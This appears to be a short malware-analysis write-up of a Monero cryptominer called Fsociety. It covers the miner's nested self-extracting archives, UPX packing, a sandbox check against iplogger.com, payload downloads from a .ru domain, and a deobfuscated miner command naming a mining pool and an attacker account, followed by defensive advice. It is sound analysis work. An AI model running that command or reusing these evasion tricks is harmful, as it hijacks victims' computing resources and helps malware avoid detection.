To Kill The Mocking Porn - Fsociety Crypto Miner

malware analysis fsociety crypto miner

Fsociety is a Monero (XMR) miner that uses multiple layers of trickery to stay hidden. It bounces users through Russian adult sites and uses several types of compression to avoid being caught by standard security tools.

Filename: fsociety_soft.exe
MD5: dfafd55bc9a0e84eafada04a5f21aead
Sample: Download via Malwr



Technical Analysis Walkthrough



Unpacking the Layers: "RAR-ception"

The infection starts with a self-extracting (SFX) RAR archive. The author nests these archives inside one another to confuse automated scanners.



  • Layer 1: fsociety_soft.exe extracts WINDOWS.exe.
  • Layer 2: That WINDOWS.exe is actually another archive that extracts a second WINDOWS.exe.
  • Layer 3: This final file is UPX Packed. Once you unpack it, you find an embedded AutoIt3 script.




Network Behavior and Anti-Analysis

When it runs, WINDOWS.exe tries to talk to iplogger.com. This acts as a simple check: if the connection fails, the malware assumes it's being analyzed in an isolated lab and shuts itself down.

If the connection works, it reaches out to porntovirt.ru to grab the rest of the tools:

  • Security.exe / system.exe — The actual mining software.
  • 1.bat — The script that kicks everything off.


The Mining Payload: 1.bat

The 1.bat file is heavily scrambled to hide its intent. Once cleaned up, we can see the exact command used to steal system resources:

C:\ProgramData\System32\system.exe -o stratum+tcp://xmr.pool.minergate.com:45560 --donate-level=1 -u lemoh4uk.sagmail.com -p x -t 2 -k

The software connects to the MinerGate pool and starts mining Monero for the user lemoh4uk.sagmail.com. It runs two instances at once, which usually pins the CPU at 100%.



How to Spot and Stop It

The final mining files are well-known to antivirus, but the initial wrappers often slip through.



  • Block SFX RARs: There’s rarely a reason to allow self-extracting archives in a professional environment.
  • Watch for High CPU: Miners are obvious if you look at performance. Any strange activity in C:\ProgramData is a red flag.
  • Flag UPX: Unless your team uses UPX-packed tools, you should treat these files as suspicious by default.


Conclusion

Fsociety is a great example of how simple threats can stay hidden through sheer effort. By burying the miner under layers of AutoIt and nested archives, the attackers hope to stay on your system long enough to make a profit.



Happy hunting.